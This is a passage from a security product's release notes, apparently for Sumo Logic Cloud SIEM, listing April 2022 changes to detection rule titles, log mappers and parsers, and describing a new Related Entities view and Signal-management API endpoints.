  • [Deleted] Windows - Security - 4798 - CIP
  • [Deleted] Windows - Security - 4799 - CIP
  • [Deleted] Windows - Security - 5038 - CIP
  • [Deleted] Windows - Security - 5058 - CIP
  • [Deleted] Windows - Security - 5059 - CIP
  • [Deleted] Windows - Security - 5061 - CIP
  • [Deleted] Windows - Security - 5140 - CIP
  • [Deleted] Windows - Security - 5379 - CIP
  • [Deleted] Windows - Security - 5805 - CIP
  • [Deleted] Windows - Security - 6272 - CIP
  • [Deleted] Windows - Security - 6273 - CIP
  • [Deleted] Windows - Security - 6275 - CIP
  • [Deleted] Windows - Security - 6278 - CIP
  • [Deleted] Windows - Security - 6416 - CIP
  • [Deleted] Windows - Security - 6423 - CIP
  • [Deleted] Windows - Security - 6424 - CIP
  • [Deleted] Windows - System - 5138 - CIP
  • [Deleted] Windows - System - 6005 - CIP
  • [Deleted] Windows - System - 6006 - CIP
  • [Deleted] Windows - System - 7045 - CIP
  • [New] BlueCat DNS Parser - Catch All
  • [Updated] AWS WAF Allow Logs
  • [Updated] AWS WAF Block Logs
  • [Updated] Firepower Catch All
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Invalid Password
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Invalid User
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure No ID String
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Failure Preauth
  • [Updated] Linux OS Syslog - Process sshd - SSH Auth Success

Parsers

  • [Deleted] /Parsers/System/BlueCat/BlueCat DHCP Syslog
  • [New] /Parsers/System/BlueCat/BlueCat DHCP-DNS Syslog
  • [New] /Parsers/System/Cisco/Cisco Firepower JSON
  • [Updated] /Parsers/System/AWS/AWS WAF
  • [Updated] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON

April 29, 2022 - Application Update

[New] The Cloud SIEM team is excited to announce a newly enhanced feature: Related Entities. Although Insights and the Signals they contain are focused on a single Entity (a user, or host for example), there are often a number of additional Entities referenced in the Records/Signals contained in the Insight. In addition, Cloud SIEM can detect relationships between Entities (for example, determining that an IP address was associated with a given hostname during the Insight detection window).

To provide an easy way for analysts to explore all of these Related Entities, a new tab has been added to the Insight Details page:

The **Entities** tab contains a list of all of the Entities detected in the Insight’s Signals and Records. The Primary Entity is listed first, and then the other Related Entities are listed in descending order of appearance. Where Cloud SIEM has determined a relationship between Entities, that is called out (for example, 192.168.1.101 may also be hostname ‘na’).

Details listed with each entity include tags, the number of Signals the Entity was seen in, the number of recent Insights and Signals that featured that Entity, and the total sum of the Severities for those Signals.

As each Entity is selected by the user, the right column changes to show more details, such as a link to the full Entity Details page, inventory and other metadata, a Signal timeline, and a list of the recent Signals and Insights (containing links to those individual details pages).

This new feature should help users understand the context of security events more quickly by providing this data at a glance, reducing the amount of time it would have previously taken to gather that same information.

More information can be found in the online documentation.

Minor Changes and Enhancements

[Update] For Signals generated by Threshold, Aggregation and Chain Rules, there is a feature called Queried Records that enables users to find additional Records that also apply to the Signal beyond those that were needed to meet the conditions for the Rule. The page that lists these Queried Records now explicitly shows the search query and time window that is being checked. If a user clicks on the query, it will open a Log Search window with the query and time window pre-filled for deeper investigation.

related-entities

April 29, 2022 - Content Release

Rules

  • [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
  • [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
  • [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
  • [Updated] THRESHOLD-S00044 DNS DGA Lookup Behavior - NXDOMAIN Responses
  • [Updated] THRESHOLD-S00088 GCP Audit Reconnaissance Activity
  • [Updated] LEGACY-S00047 High risk file extension download without hostname and referrer
  • [Updated] CHAIN-S00004 Lateral Movement Using the Windows Hidden Admin Share
  • [Updated] MATCH-S00687 Linux Security Tool Usage
  • [Updated] THRESHOLD-S00048 Outbound Traffic to Countries Outside the United States
  • [Updated] THRESHOLD-S00040 Possible DNS over TLS (DoT) Activity
  • [Updated] THRESHOLD-S00031 RDP Brute Force Attempt
  • [Updated] THRESHOLD-S00034 SSH Authentication Failures

Log Mappers

  • [New] BlueCat DHCP Parser - Catch All
  • [New] Microsoft Exchange Catch All
  • [New] Microsoft Exchange HTTP Error
  • [New] Microsoft Exchange IIS
  • [New] Varonis DatAlert - Parser
  • [Updated] Varonis DatAdvantage - CEF

Parsers

  • [New] /Parsers/System/BlueCat/BlueCat DHCP Syslog
  • [New] /Parsers/System/Microsoft/Exchange
  • [New] /Parsers/System/Varonis/Varonis DatAlert Syslog
  • [Updated] /Parsers/System/F5/F5 Syslog

April 26, 2022 - Content Release

Rules

  • [New] MATCH-S00808 Azure - Container Instance Creation/Modification
  • [New] MATCH-S00809 Azure - Container Start
  • [New] MATCH-S00807 Azure - Image Created/Modified
  • [New] MATCH-S00810 Azure - Image Deleted

Log Mappers

  • [New] Darktrace Parser Events
  • [Updated] Zscaler - Nanolog Streaming Service - JSON

Parsers

  • [New] /Parsers/System/Darktrace/Darktrace Syslog
  • [New] /Parsers/System/Zscaler/Zscaler Nanolog Streaming Service/Zscaler Nanolog Streaming Service-JSON

April 20, 2022 - Content Release

Rules

  • [New] MATCH-S00798 Azure - Anonymous Blob Access
  • [New] MATCH-S00805 Azure - Bastion Host Created/Modified
  • [New] MATCH-S00806 Azure - Bastion Host Deleted
  • [New] MATCH-S00795 Azure - Diagnostic Setting Deleted
  • [New] MATCH-S00796 Azure - Diagnostic Setting Modified
  • [New] MATCH-S00797 Azure - Event Hub Deleted
  • [New] THRESHOLD-S00109 Azure - Excessive Key Vault Get Requests
  • [New] MATCH-S00788 Azure - Key Deletion
  • [New] MATCH-S00789 Azure - Key Purged
  • [New] MATCH-S00792 Azure - Key Vault Deleted
  • [New] MATCH-S00787 Azure - Protected Item Deletion Attempt
  • [New] MATCH-S00794 Azure - Secret Backup
  • [New] MATCH-S00791 Azure - Secret Deleted
  • [New] MATCH-S00790 Azure - Secret Purged
  • [New] MATCH-S00800 Azure - Storage Deletion
  • [New] MATCH-S00799 Azure - Storage Modification
  • [New] MATCH-S00803 Azure - Virtual Machine Creation/Modification
  • [New] MATCH-S00804 Azure - Virtual Machine Deleted
  • [New] MATCH-S00801 Azure - Virtual Machine Started
  • [New] MATCH-S00802 Azure - Virtual Machine Stopped
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] MATCH-S00494 Backdoor.HTTP.BEACON.[Yelp Request]
  • [Updated] MATCH-S00492 Backdoor.HTTP.GORAT.[SID1]
  • [Updated] LEGACY-S00047 High risk file extension download without hostname and referrer
  • [Updated] MATCH-S00445 Known Ransomware File Extensions

Log Mappers

  • [New] Dropbox - Authentication
  • [New] Dropbox - Catch All
  • [Updated] Azure AuditEvent logs

Parsers

  • [Updated] /Parsers/System/AWS/GuardDuty

April 19, 2022 - Announcement

We will be consolidating Authentication Brute Force Attempt MATCH-S00258 on Tuesday May 10 into the normalized intrusion rule set. For more information on the normalized intrusion rule set, please visit the help page.


April 18, 2022 - Application Update

Minor Changes and Enhancements

  • [New] API endpoints are now available to add or remove a given Signal to/from a given Insight: PUT "/insights/<insightId>/signals" and DELETE "/insights/<insightId>/signals" respectively. (For both endpoints, the request body is a list of the Signal ID(s) to add to or remove from the Insight; the response is the updated Insight.)
  • [Update] The way Cloud SIEM displays group membership in Active Directory inventory objects is changing. Previously, it was displayed in LDAP form (i.e., cn=groupname,dc=something,dc=domain,dc=com); now it will just show the group name.

Resolved Issues

  • Signal and Insight timestamps in the Cloud SIEM UI were not always displayed in the user’s preferred time zone.

April 15, 2022 - Announcements

  • Because it can now be connected via more standardized TAXII feeds, the integration between Cloud SIEM and Anomali ThreatStream has been deprecated as of April 15, 2022. If you are using this integration, be sure to convert to a TAXII feed. To set up a feed, first follow Anomali’s documentation for Setting up a TAXII feed for ThreatStream then Sumo Logic’s documentation for Integrating Cloud SIEM with a TAXII Feed.
  • The Entity API has been updated to include a new field, IsSuppressed. This field replaces IsWhitelisted, which has been deprecated as of April 15, 2022. If you were previously using IsWhitelisted, please ensure you have switched to the new field.

April 14, 2022 - Content Release

Rules

  • [New] MATCH-S00785 Azure - Blob Container Deletion
  • [New] MATCH-S00786 Azure - SQL Database Export
  • [Updated] MATCH-S00243 Azure - High Risk Sign-In (Aggregate)
  • [Updated] MATCH-S00245 Azure - High Risk Sign-In (Real Time)
  • [Updated] MATCH-S00224 Azure - Risky User State : User Confirmed Compromised
  • [Updated] MATCH-S00250 Azure - Suspicious User Risk State Associated with Login
  • [Updated] LEGACY-S00066 PowerShell Remote Administration
  • [Updated] LEGACY-S00105 Suspicious DC Logon
  • [Updated] THRESHOLD-S00075 Too Many Kerberos Encryption Downgrade SPNs (Kerberoasting)

Log Mappers

  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Microsoft Graph AD Reporting API C2C - DirectoryAudits
  • [Updated] Microsoft Graph AD Reporting API C2C - Provisioning
  • [Updated] Microsoft Graph AD Reporting API C2C - Signin
  • [Updated] Trend Micro CEF logs

Parsers

  • [New] /Parsers/System/Trend Micro/Trend Micro Deep Security - CEF

April 12, 2022 - Content Release

Rules

  • [New] MATCH-S00784 Linux Host Entered Promiscuous Mode

Log Mappers

  • [Deleted] AWS VPC Flow Logs - Custom Format 1
  • [Deleted] Adaxes Execute Event
  • [Deleted] Adaxes Modify Event
  • [Deleted] Adaxes Run PowerShell Event
  • [Deleted] Aruba Error Logs
  • [Deleted] Aruba ICMP Logs
  • [Deleted] Aruba LDAP Server Logs
  • [Deleted] Aruba PoniUnwired HTTPD CGID Samples
  • [Deleted] Aruba PoniUnwired HTTPD Core Error Samples
  • [Deleted] Aruba PoniUnwired HTTPD Core Warn Samples
  • [Deleted] Aruba PoniUnwired HTTPD ssl error Samples
  • [Deleted] Aruba PoniUnwired Warn Samples
  • [Deleted] BIND DNS Query
  • [Deleted] BIND DNS Update Zone
  • [Deleted] BIND DNS Update Zone Failed
  • [Deleted] BIOC Credential Access logs
  • [Deleted] BIOC Dropper logs
  • [Deleted] BIOC Evasion Variation 2 logs
  • [Deleted] BIOC Evasion logs
  • [Deleted] BIOC Infiltration logs
  • [Deleted] BIOC Persistence and Execution logs
  • [Deleted] BIOC Privilege logs
  • [Deleted] BIOC Reconnaissance logs
  • [Deleted] BIOC Reconnaissance logs Variation 2
  • [Deleted] BIOC Tampering logs
  • [Deleted] BIOC create and write logs
  • [Deleted] Bandura Domain Logs
  • [Deleted] Bandura Packet Logs
  • [Deleted] Barracuda Proxy
  • [Deleted] Bind DHCP Full
  • [Deleted] Bind DHCP On
  • [Deleted] Bind DHCP Short
  • [Deleted] Bind DNS log 1
  • [Deleted] Bind DNS log 10
  • [Deleted] Bind DNS log 2
  • [Deleted] Bind DNS log 3
  • [Deleted] Bind DNS log 4
  • [Deleted] Bind DNS log 5
  • [Deleted] Bind DNS log 6
  • [Deleted] Bind DNS log 7
  • [Deleted] Bind DNS log 8
  • [Deleted] Bind DNS log 9
  • [Deleted] Bind9 DNS
  • [Deleted] Blue Coat Proxy 2
  • [Deleted] Blue Coat Proxy 4
  • [Deleted] Blue Coat Proxy 5
  • [Deleted] Blue Coat Proxy 6
  • [Deleted] Blue Coat Proxy 7
  • [Deleted] Blue Coat Proxy Logs
  • [Deleted] BlueCat DHCP Bootrequest
  • [Deleted] BlueCat DHCP Decline
  • [Deleted] BlueCat DHCP INFORM Logs
  • [Deleted] BlueCat DHCP Offer Logs
  • [Deleted] BlueCat DHCP Reuse Lease
  • [Deleted] BlueCat DHCP failover
  • [Deleted] BlueCat DNS
  • [Deleted] BlueCat DNS with Key
  • [Deleted] CB Protection
  • [Deleted] CB Protection Username
  • [Deleted] CB Response Server 1
  • [Deleted] CB Response Server 10
  • [Deleted] CB Response Server 11
  • [Deleted] CB Response Server 13
  • [Deleted] CB Response Server 14
  • [Deleted] CB Response Server 15
  • [Deleted] CB Response Server 17
  • [Deleted] CB Response Server 2
  • [Deleted] CB Response Server 20
  • [Deleted] CB Response Server 3
  • [Deleted] CB Response Server 4
  • [Deleted] CB Response Server 5
  • [Deleted] CB Response Server 6
  • [Deleted] CB Response Server 7
  • [Deleted] CB Response Server 9
  • [Deleted] CB Response Severity 1
  • [Deleted] CB Response Severity 2
  • [Deleted] CB Response Severity 3
  • [Deleted] CICSCOFW434002
  • [Deleted] Check Point ACCEPT Grok
  • [Deleted] Check Point DROP
  • [Deleted] Check Point VPN
  • [Deleted] Check Point encrypt/decrypt
  • [Deleted] Check Point key install
  • [Deleted] Cisco ACS FAILED-ATTEMPT
  • [Deleted] Cisco ACS FAILED-AUTHENTICATION
  • [Deleted] Cisco ACS Passed-Authentication
  • [Deleted] Cisco ACS Tacacs-Accounting
  • [Deleted] Cisco ASA 106002
  • [Deleted] Cisco ASA 106012
  • [Deleted] Cisco ASA 106013
  • [Deleted] Cisco ASA 106018
  • [Deleted] Cisco ASA 106022
  • [Deleted] Cisco ASA 113039
  • [Deleted] Cisco ASA 716037
  • [Deleted] Cisco ASA 716038
  • [Deleted] Cisco ASA 716039
  • [Deleted] Cisco ASA 722056
  • [Deleted] Cisco ASA 725012
  • [Deleted] Cisco ASA 725017
  • [Deleted] Cisco ASA 734003
  • [Deleted] Cisco ASA 746012
  • [Deleted] Cisco AnyConnect NAT RULES Logs
  • [Deleted] Cisco Authentication Message 01
  • [Deleted] Cisco Authentication Message 02
  • [Deleted] Cisco Authentication Message 03
  • [Deleted] Cisco Authentication Message 04
  • [Deleted] Cisco Authentication Message 05
  • [Deleted] Cisco Authentication Message 06
  • [Deleted] Cisco Authentication Message 07
  • [Deleted] Cisco Authentication Message 08
  • [Deleted] Cisco Authentication Message 09
  • [Deleted] Cisco Authentication Message 10
  • [Deleted] Cisco Authentication Message 11
  • [Deleted] Cisco Authentication Message 12
  • [Deleted] Cisco Authentication Message 13
  • [Deleted] Cisco Authentication Message 14
  • [Deleted] Cisco Authentication Message 15
  • [Deleted] Cisco IOS Message
  • [Deleted] Cisco IOS Queue Full
  • [Deleted] Cisco Ironport WSA
  • [Deleted] Cisco Ironport WSA NOHD
  • [Deleted] Cisco Ironport WSA NOHD 01
  • [Deleted] Cisco Ironport WSA NOHD 03
  • [Deleted] Cisco Meraki IDS-Alerts
  • [Deleted] Cisco Meraki Security Event
  • [Deleted] Cisco Meraki Security Filtering Disposition Change
  • [Deleted] Cisco Umbrella IP Logs Custom
  • [Deleted] Citrix NetScaler AAA Message
  • [Deleted] Citrix NetScaler API CMD EXECUTED
  • [Deleted] Citrix NetScaler Delinked Message
  • [Deleted] Citrix NetScaler Delinked Message 01
  • [Deleted] Citrix NetScaler TCP Connection Terminated
  • [Deleted] DNS_Additions
  • [Deleted] EPO_THREATS_AV
  • [Deleted] EXABEAM
  • [Deleted] F5 HTTPd Audit
  • [Deleted] F5 SSHD Samples
  • [Deleted] F5 SSL Request
  • [Deleted] Firepower Access Control
  • [Deleted] Firepower Access Control 2
  • [Deleted] Firepower Access Control 3
  • [Deleted] Firepower Access Control 4
  • [Deleted] Firepower Access Control 5
  • [Deleted] Firepower Alerts
  • [Deleted] Forcepoint NEW
  • [Deleted] Huawei SNMP LOGS
  • [Deleted] IBM WebSpheredatadevice error 1
  • [Deleted] IBM WebSpheredatadevice error 2
  • [Deleted] IBM WebSpheredatadevice error 3
  • [Deleted] IBM WebSpheredatadevice error 4
  • [Deleted] IBM WebSpheredatadevice error 5
  • [Deleted] INFOBLOX_DNS_QUERIES LOGS
  • [Deleted] INFOBLOX_DNS_QUERIES LOGS - NIOS
  • [Deleted] Infoblox DHCP Updater 1
  • [Deleted] Infoblox DHCP Updater 2
  • [Deleted] Infoblox DHCP Updater 3
  • [Deleted] Infoblox DHCP Updater 4
  • [Deleted] Infoblox DHCP Updater 5
  • [Deleted] Infoblox DHCPACK RENEW Samples
  • [Deleted] Infoblox DHCPACK v2 Samples
  • [Deleted] Infoblox DHCPDISCOVER Samples
  • [Deleted] Infoblox DHCPDISCOVER Samples 2
  • [Deleted] Infoblox DHCPDISCOVER Unknown network Sample
  • [Deleted] Infoblox DHCPEXPIRE Samples
  • [Deleted] Infoblox DHCPNAK Samples
  • [Deleted] Infoblox DHCPOFFER UID Samples
  • [Deleted] Infoblox DHCPRELEASE Samples
  • [Deleted] Infoblox DNS Request AXRF Ended
  • [Deleted] Infoblox DNS Request AXRF Started
  • [Deleted] Infoblox DNS Response
  • [Deleted] Infoblox DNS Zone Update 1
  • [Deleted] Infoblox DNS Zone Update 2
  • [Deleted] Infoblox DNS Zone Update 3
  • [Deleted] Infoblox DNS Zone Update 4
  • [Deleted] Infoblox DNS Zone Update 5
  • [Deleted] Infoblox DNS Zone Update 6
  • [Deleted] Infoblox Domain Notified
  • [Deleted] Invalid Login
  • [Deleted] IronPort Quarantined MID
  • [Deleted] IronPort Quarantined TO
  • [Deleted] Ironport DCID Message
  • [Deleted] Ironport DKIM
  • [Deleted] Ironport ICID Message
  • [Deleted] Ironport Info IC
  • [Deleted] Ironport Info IC and Msg
  • [Deleted] Ironport Info ISQ or RPC
  • [Deleted] Ironport Info Message
  • [Deleted] Ironport Info Mid Info
  • [Deleted] Ironport WSA SFIMS Protocol 1
  • [Deleted] Ironport WSA SFIMS Protocol 2
  • [Deleted] Ironport WSA SFIMS Protocol 3
  • [Deleted] Ironport WSA SFIMS Protocol 4
  • [Deleted] Ironport Warn Message
  • [Deleted] Ironport Warning Connection Error
  • [Deleted] Ironport Warning Full
  • [Deleted] Ironport Warning Invalid DNS FULL
  • [Deleted] Ironport Warning LIMIT
  • [Deleted] Juniper Flow Reassemble Logs
  • [Deleted] Juniper Session Error Logs
  • [Deleted] LINUX User Auth with Hostname
  • [Deleted] Linux Laravel Activity Logs
  • [Deleted] Linux Laravel Activity Logs 01
  • [Deleted] Linux Laravel Login Logs
  • [Deleted] LinuxServer Audit Logs 01
  • [Deleted] LinuxServer Audit Logs 02
  • [Deleted] LinuxServer Log 1
  • [Deleted] LinuxServer Log 11
  • [Deleted] LinuxServer Log 2
  • [Deleted] LinuxServer Log 3
  • [Deleted] LinuxServer Log 4
  • [Deleted] LinuxServer Log 5
  • [Deleted] LinuxServer Log 6
  • [Deleted] LinuxServer Log 7
  • [Deleted] Mcafee MVISION CASB Log
  • [Deleted] NSM_THREAT_IPS
  • [Deleted] Network Management Logs
  • [Deleted] Oauth Logs
  • [Deleted] Ossec Group Addition Logs
  • [Deleted] Ossec Insecure Connection Logs
  • [Deleted] Ossec Integrity checksum Logs
  • [Deleted] Ossec Root Login Refused Logs
  • [Deleted] Ossec ssh server Logs
  • [Deleted] Palo Alto Traps Analytics
  • [Deleted] Palo Alto Traps Analytics - Cloud
  • [Deleted] Palo Alto Traps Config - Cloud
  • [Deleted] Palo Alto Traps Event
  • [Deleted] Palo Alto Traps Events Updated
  • [Deleted] Palo Alto Traps Misc - Cloud
  • [Deleted] Palo Alto Traps System - Cloud
  • [Deleted] Pulse Secure Endpoint
  • [Deleted] Pulse Secure Logs
  • [Deleted] Renew Logs
  • [Deleted] Shibboleth DUO
  • [Deleted] Shibboleth HTTP Redirect EDU
  • [Deleted] Shibboleth HTTP Redirect Email
  • [Deleted] Shibboleth LDAP
  • [Deleted] Shibboleth LDAP Email
  • [Deleted] Snare AgentHeartBeat Logs
  • [Deleted] Snare Windows DHCP Logs
  • [Deleted] SonicWall Bad FTP Protocol
  • [Deleted] SonicWall Block Dropped Events
  • [Deleted] SonicWall Flood Attack
  • [Deleted] SonicWall IPS
  • [Deleted] SonicWall Port Scan
  • [Deleted] SonicWall URL Filter
  • [Deleted] Successful Login
  • [Deleted] Successful Logins
  • [Deleted] Successful SSH Login
  • [Deleted] Suricata HTTP Logs
  • [Deleted] Suricata LogStash
  • [Deleted] Suricata Logstash Custom
  • [Deleted] Suricata Threat Logs
  • [Deleted] Symantec SEP AntiVirus
  • [Deleted] Symantec SEP Potential Risk Found 01
  • [Deleted] Symantec SEP Potential Risk Found 2
  • [Deleted] Symantec SEP Potential Risk Found 3
  • [Deleted] Symantec SEP SONAR
  • [Deleted] Symantec SEP Security Risk Found
  • [Deleted] Symantec SEP Sonar Detection
  • [Deleted] Symantec SEP USB Drive
  • [Deleted] Tanium S24 Logs
  • [Deleted] VLT Vault Extra
  • [Deleted] VMware Logs 1
  • [Deleted] VMware Logs 2
  • [Deleted] VMware Logs 3
  • [Deleted] VMware Logs 4
  • [Deleted] VMware Logs 5
  • [Deleted] VMware Logs 6
  • [Deleted] VMware Logs 7
  • [Deleted] VMware Logs 8
  • [Deleted] VPN Messages
  • [Deleted] VPN Messages 2
  • [Deleted] VPN Messages 3
  • [Deleted] VPN Messages 4
  • [Deleted] VPN Messages 5
  • [Deleted] WatchGuard flow log
  • [Deleted] WatchGuard flow log 2
  • [Deleted] Windows DHCP
  • [Deleted] Windows Defender Unstructured
  • [Deleted] Windows QUICK FIX
  • [Deleted] Zscaler Firewall Grok
  • [Deleted] cisco17
  • [Deleted] cisco20
  • [Deleted] ePO Threat Event
  • [New] AWS EKS - Custom Parser
  • [New] Azure Storage Analytics
  • [New] Citrix NetScaler - SSL Handshake Success
  • [Updated] Azure Administrative logs
  • [Updated] Azure Write and Delete Logs
  • [Updated] Citrix NetScaler - AAA-LOGIN_FAILED
  • [Updated] Citrix NetScaler - Command Executed
  • [Updated] Citrix NetScaler - SSLVPN-HTTPREQUEST
  • [Updated] Citrix NetScaler - SSLVPN-ICA Events
  • [Updated] Citrix NetScaler - SSLVPN-LOGIN
  • [Updated] Citrix NetScaler - SSLVPN-LOGOUT
  • [Updated] Citrix NetScaler - SSLVPN-TCPCONNSTAT

Parsers

  • [New] /Parsers/System/AWS/AWS EKS
  • [New] /Parsers/System/Microsoft/Azure Storage Analytics
  • [Updated] /Parsers/System/Citrix/Citrix NetScaler Syslog

Legacy Parsers

  • [Deleted] 4624
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CGID_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CORE_ERROR_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_CORE_WARN_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_HTTPD_SSL_ERROR_SAMPLES
  • [Deleted] ARUBA_PONIUNWIRED_WARN_SAMPLES
  • [Deleted] ASA_106002
  • [Deleted] ASA_106013
  • [Deleted] ASA_106018
  • [Deleted] ASA_106022
  • [Deleted] ASA_113039
  • [Deleted] ASA_5_746012
  • [Deleted] ASA_6_106012
  • [Deleted] ASA_716037
  • [Deleted] ASA_716038
  • [Deleted] ASA_716039
  • [Deleted] ASA_722056
  • [Deleted] ASA_7_725012
  • [Deleted] ASA_7_725017
  • [Deleted] ASA_7_734003
  • [Deleted] AWS_VPC_FLOW_CUSTOM_1
  • [Deleted] Adaxes_Execute_Event
  • [Deleted] Adaxes_Modify_Event
  • [Deleted] Adaxes_Run_PowerShell_Event
  • [Deleted] Aruba_Error_Logs
  • [Deleted] Aruba_ICMP_Logs
  • [Deleted] Aruba_LDAP_Server_Logs
  • [Deleted] BANDURA_DOMAIN_LOGS
  • [Deleted] BANDURA_PACKET_LOGS
  • [Deleted] BARRACUDA_PROXY
  • [Deleted] BIND9
  • [Deleted] BIND_DHCP_FOR_FULL
  • [Deleted] BIND_DHCP_FOR_SHORT
  • [Deleted] BIND_DHCP_ON
  • [Deleted] BIND_Query
  • [Deleted] BIND_Update_Zone
  • [Deleted] BIND_Update_Zone_Failure
  • [Deleted] BIOC_CREATE_AND_WRITE
  • [Deleted] BIOC_CREDENTIAL_ACCESS
  • [Deleted] BIOC_DROPPER
  • [Deleted] BIOC_EVASION
  • [Deleted] BIOC_EVASION_VARIATION_2
  • [Deleted] BIOC_INFILTRATION
  • [Deleted] BIOC_PERSISTENCE_EXECUTION
  • [Deleted] BIOC_PRIVILEGE
  • [Deleted] BIOC_RECONNAISSANCE
  • [Deleted] BIOC_RECONNAISSANCE_VARIATION_2
  • [Deleted] BIOC_TAMPERING
  • [Deleted] BLUECAT_DHCP_BOOTREQUEST
  • [Deleted] BLUECAT_DHCP_DECLINE
  • [Deleted] BLUECAT_DHCP_INFORM
  • [Deleted] BLUECAT_DHCP_OFFER
  • [Deleted] BLUECAT_DHCP_failover
  • [Deleted] BLUECAT_DHCP_reuse_lease
  • [Deleted] BLUECAT_DNS_NO_KEY
  • [Deleted] BLUECAT_DNS_WITH_KEY
